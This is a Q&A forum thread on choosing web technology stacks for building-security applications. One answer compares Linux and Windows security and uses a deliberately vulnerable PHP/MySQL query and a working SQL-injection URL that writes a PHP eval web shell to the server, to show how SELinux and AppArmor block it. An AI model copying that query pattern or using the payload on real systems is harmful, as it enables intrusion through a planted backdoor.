views:

46

answers:

2

In this case security means building security (access control, alarm systems, etc). And I am not talking about working directly with the hardware, more focused on web based applications/api's that clients or companies can use?

Are there technologies that are commonly used? Are there technologies that shouldn't be used? Are there any real benefits to a linux based stack as opposed to a windows based stack for exposing web based applications?

+1  A: 

Are there any real benefits to a linux based stack as opposed to a windows based stack for exposing web based applications?

The answer is yes, no doubt about it. All platforms have their problems. However, Linux secuirty systems such as SELinux and AppArmor will break exploits that windows cannot, and I can give a great example.

It is tricky to obtain full remote code execution with MySQL. MS-SQL can allow access to xp_cmdshell() which calls cmd.exe, this makes exploiting SQL Injection a lot easier with this privilege.

To exploit a LAMP system that is vulnerable to sql injection your best bet is to upload a .php file and try and execute it. In MySQL there is the file_priv functions, most importantly: load_file() and into outfile "...". A sql injection attack will look like this:

Vulnerable code:

mysql_query('select "name" from users where id='.$_GET[id])

The corresponding exploit code:

http://127.0.0.1/sql_inj.php?id=1 union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php"

This does assume that the document root is in /var/www and that the database and httpd are on the same system. The important part is that both AppArmor and SELInux will not allow MySQL to create the file /var/www/backdoor.php and the exploit will fail.

In this case the best approach is to disallow file_priv, however this attack pattern of creating a persistent backdoor is extremely common with other exploits. This is exaclty why AppArmor and SELInux have been built, to break the exploitation process.

By contrast Windows 2008 has absolutely no secuirty system to stop this type of attack. Windows usually lags behind when it comes to secuirty features, you can see this with Microsoft's slow adoption of memory protection such as canaries and ASLR.

Further more Microsoft is responsible for more dangerous software bugs than any other software vendor.

Rook
Your last statement is no longer true according to the Symantec. Microsoft was passed by Adobe in 2009. Microsoft still dominated in quantity of vulnerabilities executed, but Adobe had the most severely executed vulnerability. Read the threat report volume XV: http://www.symantec.com/business/theme.jsp?themeid=threatreport
Disregard the previous comment. Adobe had the second most severely attacked vulnerability and not the first. I was in error.
@Austin Cheney I agree that Adobe has a horrible track record. I was mainly referring to the link of the top 30 bugs I posted which shows Microsoft as the clear winner with the most serious bug and the most appearances.
Rook
A: 

I actually wrote a paper about this recently. More important than what I wrote are the sources I referenced. This will not tell you want you should use to be secure, but instead seeks to identify the problems so you can better know what not to use.

http://mailmarkup.org/Security_Solution.pdf